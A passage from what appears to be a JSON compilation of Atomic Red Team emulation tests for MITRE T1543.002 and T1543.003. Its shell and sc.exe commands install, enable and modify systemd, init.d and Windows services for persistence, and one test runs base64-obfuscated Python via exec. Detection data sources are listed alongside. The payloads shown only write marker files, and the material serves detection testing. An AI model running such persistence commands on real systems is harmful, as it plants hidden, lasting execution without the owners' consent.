#{systemd_service_path}/#{systemd_service_file}\necho \"ExecReload=/bin/touch /tmp/art-systemd-execreload-marker\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecStop=#{execstop_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecStopPost=#{execstoppost_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"[Install]\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"WantedBy=default.target\" >> #{systemd_service_path}/#{systemd_service_file}\nsystemctl daemon-reload\nsystemctl enable #{systemd_service_file}\nsystemctl start #{systemd_service_file}\n", + "echo \"[Unit]\" > #{systemd_service_path}/#{systemd_service_file}\necho \"Description=Atomic Red Team Systemd Service\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"[Service]\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"Type=simple\"\necho \"ExecStart=/bin/touch /tmp/art-systemd-execstart-marker\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecStartPre=#{execstartpre_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecStartPost=#{execstartpost_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecReload=#{execreload_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecStop=#{execstop_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecStopPost=#{execstoppost_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"[Install]\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"WantedBy=default.target\" >> #{systemd_service_path}/#{systemd_service_file}\nsystemctl daemon-reload\nsystemctl enable #{systemd_service_file}\nsystemctl start #{systemd_service_file}\n", + "echo \"[Unit]\" > 
#{systemd_service_path}/#{systemd_service_file}\necho \"Description=Atomic Red Team Systemd Service\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"[Service]\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"Type=simple\"\necho \"ExecStart=#{execstart_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecStartPre=#{execstartpre_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecStartPost=#{execstartpost_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecReload=#{execreload_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecStop=/bin/touch /tmp/art-systemd-execstop-marker\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecStopPost=#{execstoppost_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"[Install]\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"WantedBy=default.target\" >> #{systemd_service_path}/#{systemd_service_file}\nsystemctl daemon-reload\nsystemctl enable #{systemd_service_file}\nsystemctl start #{systemd_service_file}\n", + "echo \"[Unit]\" > #{systemd_service_path}/#{systemd_service_file}\necho \"Description=Atomic Red Team Systemd Service\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"[Service]\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"Type=simple\"\necho \"ExecStart=#{execstart_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecStartPre=/bin/touch /tmp/art-systemd-execstartpre-marker\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecStartPost=#{execstartpost_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecReload=#{execreload_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho 
\"ExecStop=#{execstop_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecStopPost=#{execstoppost_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"[Install]\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"WantedBy=default.target\" >> #{systemd_service_path}/#{systemd_service_file}\nsystemctl daemon-reload\nsystemctl enable #{systemd_service_file}\nsystemctl start #{systemd_service_file}\n", + "echo \"[Unit]\" > #{systemd_service_path}/#{systemd_service_file}\necho \"Description=Atomic Red Team Systemd Service\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"[Service]\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"Type=simple\"\necho \"ExecStart=#{execstart_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecStartPre=#{execstartpre_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecStartPost=/bin/touch /tmp/art-systemd-execstartpost-marker\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecReload=#{execreload_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecStop=#{execstop_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecStopPost=#{execstoppost_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"[Install]\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"WantedBy=default.target\" >> #{systemd_service_path}/#{systemd_service_file}\nsystemctl daemon-reload\nsystemctl enable #{systemd_service_file}\nsystemctl start #{systemd_service_file}\n", + "cat > /etc/init.d/T1543.002 << EOF\n#!/bin/bash\n### BEGIN INIT INFO\n# Provides : Atomic Test T1543.002\n# Required-Start: $all\n# Required-Stop : \n# Default-Start: 2 3 4 5\n# Default-Stop: \n# Short Description: Atomic Test for 
Systemd Service Creation\n### END INIT INFO\npython3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBDcmVhdGluZyBTeXN0ZW1kIFNlcnZpY2UgVDE1NDMuMDAyID4gL3RtcC9UMTU0My4wMDIuc3lzdGVtZC5zZXJ2aWNlLmNyZWF0aW9uJykK'))\"\nEOF\n\nchmod +x /etc/init.d/T1543.002\nif [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ]; then update-rc.d T1543.002 defaults; elif [ $(cat /etc/os-release | grep -i 'ID=\"centos\"') ]; then chkconfig T1543.002 on ; else echo \"Please run this test on Ubnutu , kali OR centos\" ; fi ;\nsystemctl enable T1543.002\nsystemctl start T1543.002\n\necho \"python3 -c \\\"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgYSBTeXN0ZW1kIFNlcnZpY2UgVDE1NDMuMDAyID4gL3RtcC9UMTU0My4wMDIuc3lzdGVtZC5zZXJ2aWNlLm1vZGlmaWNhdGlvbicpCg=='))\\\"\" | sudo tee -a /etc/init.d/T1543.002\nsystemctl daemon-reload\nsystemctl restart T1543.002\n" + ], + "commands": [ + { + "command": "echo \"[Unit]\" > /etc/systemd/system/#{systemd_service_file}\necho \"Description=Atomic Red Team Systemd Service\" >> /etc/systemd/system/#{systemd_service_file}\necho \"\" >> /etc/systemd/system/#{systemd_service_file}\necho \"[Service]\" >> /etc/systemd/system/#{systemd_service_file}\necho \"Type=simple\"\necho \"ExecStart=#{execstart_action}\" >> /etc/systemd/system/#{systemd_service_file}\necho \"ExecStartPre=#{execstartpre_action}\" >> /etc/systemd/system/#{systemd_service_file}\necho \"ExecStartPost=#{execstartpost_action}\" >> /etc/systemd/system/#{systemd_service_file}\necho \"ExecReload=#{execreload_action}\" >> /etc/systemd/system/#{systemd_service_file}\necho \"ExecStop=#{execstop_action}\" >> /etc/systemd/system/#{systemd_service_file}\necho \"ExecStopPost=#{execstoppost_action}\" >> /etc/systemd/system/#{systemd_service_file}\necho \"\" >> /etc/systemd/system/#{systemd_service_file}\necho \"[Install]\" >> 
/etc/systemd/system/#{systemd_service_file}\necho \"WantedBy=default.target\" >> /etc/systemd/system/#{systemd_service_file}\nsystemctl daemon-reload\nsystemctl enable #{systemd_service_file}\nsystemctl start #{systemd_service_file}\n", + "source": "atomics/T1543.002/T1543.002.yaml", + "name": "Atomic Red Team Test - Create or Modify System Process: Systemd Service" + }, + { + "command": "echo \"[Unit]\" > #{systemd_service_path}/art-systemd-service.service\necho \"Description=Atomic Red Team Systemd Service\" >> #{systemd_service_path}/art-systemd-service.service\necho \"\" >> #{systemd_service_path}/art-systemd-service.service\necho \"[Service]\" >> #{systemd_service_path}/art-systemd-service.service\necho \"Type=simple\"\necho \"ExecStart=#{execstart_action}\" >> #{systemd_service_path}/art-systemd-service.service\necho \"ExecStartPre=#{execstartpre_action}\" >> #{systemd_service_path}/art-systemd-service.service\necho \"ExecStartPost=#{execstartpost_action}\" >> #{systemd_service_path}/art-systemd-service.service\necho \"ExecReload=#{execreload_action}\" >> #{systemd_service_path}/art-systemd-service.service\necho \"ExecStop=#{execstop_action}\" >> #{systemd_service_path}/art-systemd-service.service\necho \"ExecStopPost=#{execstoppost_action}\" >> #{systemd_service_path}/art-systemd-service.service\necho \"\" >> #{systemd_service_path}/art-systemd-service.service\necho \"[Install]\" >> #{systemd_service_path}/art-systemd-service.service\necho \"WantedBy=default.target\" >> #{systemd_service_path}/art-systemd-service.service\nsystemctl daemon-reload\nsystemctl enable art-systemd-service.service\nsystemctl start art-systemd-service.service\n", + "source": "atomics/T1543.002/T1543.002.yaml", + "name": "Atomic Red Team Test - Create or Modify System Process: Systemd Service" + }, + { + "command": "echo \"[Unit]\" > #{systemd_service_path}/#{systemd_service_file}\necho \"Description=Atomic Red Team Systemd Service\" >> 
#{systemd_service_path}/#{systemd_service_file}\necho \"\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"[Service]\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"Type=simple\"\necho \"ExecStart=#{execstart_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecStartPre=#{execstartpre_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecStartPost=#{execstartpost_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecReload=#{execreload_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecStop=#{execstop_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecStopPost=/bin/touch /tmp/art-systemd-execstoppost-marker\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"[Install]\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"WantedBy=default.target\" >> #{systemd_service_path}/#{systemd_service_file}\nsystemctl daemon-reload\nsystemctl enable #{systemd_service_file}\nsystemctl start #{systemd_service_file}\n", + "source": "atomics/T1543.002/T1543.002.yaml", + "name": "Atomic Red Team Test - Create or Modify System Process: Systemd Service" + }, + { + "command": "echo \"[Unit]\" > #{systemd_service_path}/#{systemd_service_file}\necho \"Description=Atomic Red Team Systemd Service\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"[Service]\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"Type=simple\"\necho \"ExecStart=#{execstart_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecStartPre=#{execstartpre_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecStartPost=#{execstartpost_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecReload=/bin/touch /tmp/art-systemd-execreload-marker\" >> 
#{systemd_service_path}/#{systemd_service_file}\necho \"ExecStop=#{execstop_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecStopPost=#{execstoppost_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"[Install]\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"WantedBy=default.target\" >> #{systemd_service_path}/#{systemd_service_file}\nsystemctl daemon-reload\nsystemctl enable #{systemd_service_file}\nsystemctl start #{systemd_service_file}\n", + "source": "atomics/T1543.002/T1543.002.yaml", + "name": "Atomic Red Team Test - Create or Modify System Process: Systemd Service" + }, + { + "command": "echo \"[Unit]\" > #{systemd_service_path}/#{systemd_service_file}\necho \"Description=Atomic Red Team Systemd Service\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"[Service]\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"Type=simple\"\necho \"ExecStart=/bin/touch /tmp/art-systemd-execstart-marker\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecStartPre=#{execstartpre_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecStartPost=#{execstartpost_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecReload=#{execreload_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecStop=#{execstop_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecStopPost=#{execstoppost_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"[Install]\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"WantedBy=default.target\" >> #{systemd_service_path}/#{systemd_service_file}\nsystemctl daemon-reload\nsystemctl enable #{systemd_service_file}\nsystemctl start #{systemd_service_file}\n", + "source": 
"atomics/T1543.002/T1543.002.yaml", + "name": "Atomic Red Team Test - Create or Modify System Process: Systemd Service" + }, + { + "command": "echo \"[Unit]\" > #{systemd_service_path}/#{systemd_service_file}\necho \"Description=Atomic Red Team Systemd Service\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"[Service]\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"Type=simple\"\necho \"ExecStart=#{execstart_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecStartPre=#{execstartpre_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecStartPost=#{execstartpost_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecReload=#{execreload_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecStop=/bin/touch /tmp/art-systemd-execstop-marker\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecStopPost=#{execstoppost_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"[Install]\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"WantedBy=default.target\" >> #{systemd_service_path}/#{systemd_service_file}\nsystemctl daemon-reload\nsystemctl enable #{systemd_service_file}\nsystemctl start #{systemd_service_file}\n", + "source": "atomics/T1543.002/T1543.002.yaml", + "name": "Atomic Red Team Test - Create or Modify System Process: Systemd Service" + }, + { + "command": "echo \"[Unit]\" > #{systemd_service_path}/#{systemd_service_file}\necho \"Description=Atomic Red Team Systemd Service\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"[Service]\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"Type=simple\"\necho \"ExecStart=#{execstart_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecStartPre=/bin/touch 
/tmp/art-systemd-execstartpre-marker\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecStartPost=#{execstartpost_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecReload=#{execreload_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecStop=#{execstop_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecStopPost=#{execstoppost_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"[Install]\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"WantedBy=default.target\" >> #{systemd_service_path}/#{systemd_service_file}\nsystemctl daemon-reload\nsystemctl enable #{systemd_service_file}\nsystemctl start #{systemd_service_file}\n", + "source": "atomics/T1543.002/T1543.002.yaml", + "name": "Atomic Red Team Test - Create or Modify System Process: Systemd Service" + }, + { + "command": "echo \"[Unit]\" > #{systemd_service_path}/#{systemd_service_file}\necho \"Description=Atomic Red Team Systemd Service\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"[Service]\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"Type=simple\"\necho \"ExecStart=#{execstart_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecStartPre=#{execstartpre_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecStartPost=/bin/touch /tmp/art-systemd-execstartpost-marker\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecReload=#{execreload_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecStop=#{execstop_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecStopPost=#{execstoppost_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"[Install]\" >> 
#{systemd_service_path}/#{systemd_service_file}\necho \"WantedBy=default.target\" >> #{systemd_service_path}/#{systemd_service_file}\nsystemctl daemon-reload\nsystemctl enable #{systemd_service_file}\nsystemctl start #{systemd_service_file}\n", + "source": "atomics/T1543.002/T1543.002.yaml", + "name": "Atomic Red Team Test - Create or Modify System Process: Systemd Service" + }, + { + "command": "cat > /etc/init.d/T1543.002 << EOF\n#!/bin/bash\n### BEGIN INIT INFO\n# Provides : Atomic Test T1543.002\n# Required-Start: $all\n# Required-Stop : \n# Default-Start: 2 3 4 5\n# Default-Stop: \n# Short Description: Atomic Test for Systemd Service Creation\n### END INIT INFO\npython3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBDcmVhdGluZyBTeXN0ZW1kIFNlcnZpY2UgVDE1NDMuMDAyID4gL3RtcC9UMTU0My4wMDIuc3lzdGVtZC5zZXJ2aWNlLmNyZWF0aW9uJykK'))\"\nEOF\n\nchmod +x /etc/init.d/T1543.002\nif [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ]; then update-rc.d T1543.002 defaults; elif [ $(cat /etc/os-release | grep -i 'ID=\"centos\"') ]; then chkconfig T1543.002 on ; else echo \"Please run this test on Ubnutu , kali OR centos\" ; fi ;\nsystemctl enable T1543.002\nsystemctl start T1543.002\n\necho \"python3 -c \\\"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgYSBTeXN0ZW1kIFNlcnZpY2UgVDE1NDMuMDAyID4gL3RtcC9UMTU0My4wMDIuc3lzdGVtZC5zZXJ2aWNlLm1vZGlmaWNhdGlvbicpCg=='))\\\"\" | sudo tee -a /etc/init.d/T1543.002\nsystemctl daemon-reload\nsystemctl restart T1543.002\n", + "source": "atomics/T1543.002/T1543.002.yaml", + "name": "Atomic Red Team Test - Create or Modify System Process: Systemd Service" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1543.002", + "display_name": "Create or Modify System Process: Systemd Service", + "atomic_tests": [ + { + "name": "Create Systemd Service", + "auto_generated_guid": 
"d9e4f24f-aa67-4c6e-bcbf-85622b697a7c", + "description": "This test creates a Systemd service unit file and enables it as a service.\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "systemd_service_path": { + "description": "Path to systemd service unit file", + "type": "Path", + "default": "/etc/systemd/system" + }, + "systemd_service_file": { + "description": "File name of systemd service unit file", + "type": "String", + "default": "art-systemd-service.service" + }, + "execstoppost_action": { + "description": "ExecStopPost action for Systemd service", + "type": "String", + "default": "/bin/touch /tmp/art-systemd-execstoppost-marker" + }, + "execreload_action": { + "description": "ExecReload action for Systemd service", + "type": "String", + "default": "/bin/touch /tmp/art-systemd-execreload-marker" + }, + "execstart_action": { + "description": "ExecStart action for Systemd service", + "type": "String", + "default": "/bin/touch /tmp/art-systemd-execstart-marker" + }, + "execstop_action": { + "description": "ExecStop action for Systemd service", + "type": "String", + "default": "/bin/touch /tmp/art-systemd-execstop-marker" + }, + "execstartpre_action": { + "description": "ExecStartPre action for Systemd service", + "type": "String", + "default": "/bin/touch /tmp/art-systemd-execstartpre-marker" + }, + "execstartpost_action": { + "description": "ExecStartPost action for Systemd service", + "type": "String", + "default": "/bin/touch /tmp/art-systemd-execstartpost-marker" + } + }, + "executor": { + "command": "echo \"[Unit]\" > #{systemd_service_path}/#{systemd_service_file}\necho \"Description=Atomic Red Team Systemd Service\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"[Service]\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"Type=simple\"\necho \"ExecStart=#{execstart_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho 
\"ExecStartPre=#{execstartpre_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecStartPost=#{execstartpost_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecReload=#{execreload_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecStop=#{execstop_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecStopPost=#{execstoppost_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"[Install]\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"WantedBy=default.target\" >> #{systemd_service_path}/#{systemd_service_file}\nsystemctl daemon-reload\nsystemctl enable #{systemd_service_file}\nsystemctl start #{systemd_service_file}\n", + "cleanup_command": "systemctl stop #{systemd_service_file}\nsystemctl disable #{systemd_service_file}\nrm -rf #{systemd_service_path}/#{systemd_service_file}\nsystemctl daemon-reload\n", + "name": "bash" + } + }, + { + "name": "Create Systemd Service file, Enable the service , Modify and Reload the service.", + "auto_generated_guid": "c35ac4a8-19de-43af-b9f8-755da7e89c89", + "description": "This test creates a systemd service unit file and enables it to autostart on boot. Once service is created and enabled, it also modifies this same service file showcasing both Creation and Modification of system process. 
\n", + "supported_platforms": [ + "linux" + ], + "dependencies": [ + { + "description": "System must be Ubuntu ,Kali OR CentOS.\n", + "prereq_command": "if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ] || [ $(cat /etc/os-release | grep -i 'ID=\"centos\"') ]; then exit /b 0; else exit /b 1; fi;\n", + "get_prereq_command": "echo Please run from Ubuntu ,Kali OR CentOS.\n" + } + ], + "executor": { + "name": "bash", + "elevation_required": true, + "command": "cat > /etc/init.d/T1543.002 << EOF\n#!/bin/bash\n### BEGIN INIT INFO\n# Provides : Atomic Test T1543.002\n# Required-Start: $all\n# Required-Stop : \n# Default-Start: 2 3 4 5\n# Default-Stop: \n# Short Description: Atomic Test for Systemd Service Creation\n### END INIT INFO\npython3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBDcmVhdGluZyBTeXN0ZW1kIFNlcnZpY2UgVDE1NDMuMDAyID4gL3RtcC9UMTU0My4wMDIuc3lzdGVtZC5zZXJ2aWNlLmNyZWF0aW9uJykK'))\"\nEOF\n\nchmod +x /etc/init.d/T1543.002\nif [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ]; then update-rc.d T1543.002 defaults; elif [ $(cat /etc/os-release | grep -i 'ID=\"centos\"') ]; then chkconfig T1543.002 on ; else echo \"Please run this test on Ubnutu , kali OR centos\" ; fi ;\nsystemctl enable T1543.002\nsystemctl start T1543.002\n\necho \"python3 -c \\\"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgYSBTeXN0ZW1kIFNlcnZpY2UgVDE1NDMuMDAyID4gL3RtcC9UMTU0My4wMDIuc3lzdGVtZC5zZXJ2aWNlLm1vZGlmaWNhdGlvbicpCg=='))\\\"\" | sudo tee -a /etc/init.d/T1543.002\nsystemctl daemon-reload\nsystemctl restart T1543.002\n", + "cleanup_command": "systemctl stop T1543.002\nsystemctl disable T1543.002\nrm -rf /etc/init.d/T1543.002\nsystemctl daemon-reload\n" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about 
file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + 
"Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service creation", + "description": "A service/daemon was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "service" + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service modification", + "description": "A service/daemon was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "service" + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + 
"collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service modification", + "description": "A service/daemon was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "service" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/dotnet/framework/windows-services/introduction-to-windows-service-applications", + "https://www.linux.com/news/introduction-services-runlevels-and-rcd-scripts/" + ] + ] + }, + { + "technique_id": "T1543.003", + "command_list": [ + "sc config Fax binPath= \"C:\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -noexit -c \\\"write-host 'T1543.003 Test'\\\"\"\nsc start Fax\n", + "sc.exe create #{service_name} binPath= PathToAtomicsFolder\\T1543.003\\bin\\AtomicService.exe\nsc.exe start #{service_name}\n", + "sc.exe create AtomicTestService_CMD binPath= #{binary_path}\nsc.exe start AtomicTestService_CMD\n", + "New-Service -Name \"#{service_name}\" -BinaryPathName \"PathToAtomicsFolder\\T1543.003\\bin\\AtomicService.exe\"\nStart-Service -Name \"#{service_name}\"\n", + "New-Service -Name 